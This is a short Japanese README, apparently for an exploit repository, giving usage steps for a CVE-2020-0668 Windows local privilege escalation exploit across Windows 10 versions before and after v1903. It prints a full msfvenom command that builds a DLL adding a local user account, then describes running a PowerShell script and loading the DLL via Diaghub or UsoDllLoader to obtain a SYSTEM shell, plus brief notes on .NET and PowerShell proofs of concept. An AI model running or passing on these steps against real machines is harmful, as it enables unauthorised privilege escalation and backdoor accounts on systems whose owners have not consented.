
CVE-2020-0668 エクスプロイトを、win10 v1903 未満のバージョンと win10 v1903 以上のバージョンで動作させる
CVE-2020-0668 エクスプロイトを version < win10 v1903 と version >= win10 v1903 で動作させる
powershell エクスプロイトは Diaghub を使用して version < win10 v1903 で動作します。
msfvenom で evil.dll を生成する
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllpowershell で exp.ps1 を実行するDiaghub.exe C:\ProgramData evil.dll を実行して DLL を読み込み、ユーザーを追加する
powershell エクスプロイトは UsoDllLoader を使用して version >= win10 v1903 で動作します。
powershell で exp.ps1 を実行するUsoDllLoader.exe を実行してシステムシェルを取得する
SysTracingPoc の x86 リリース版で、issue 向けのものです。UsoLoadDll のため、エクスプロイトは version >= win10 v1903 で動作します。
.NET の PoC です。C:\Windows\System32\evil.dll を確認し、evil.txt に名前を変更すると、DLL ファイルではなく、トレースログのみが含まれていることがわかります。
powershell の PoC です。これも evil.dll 内にはトレースログしかありません。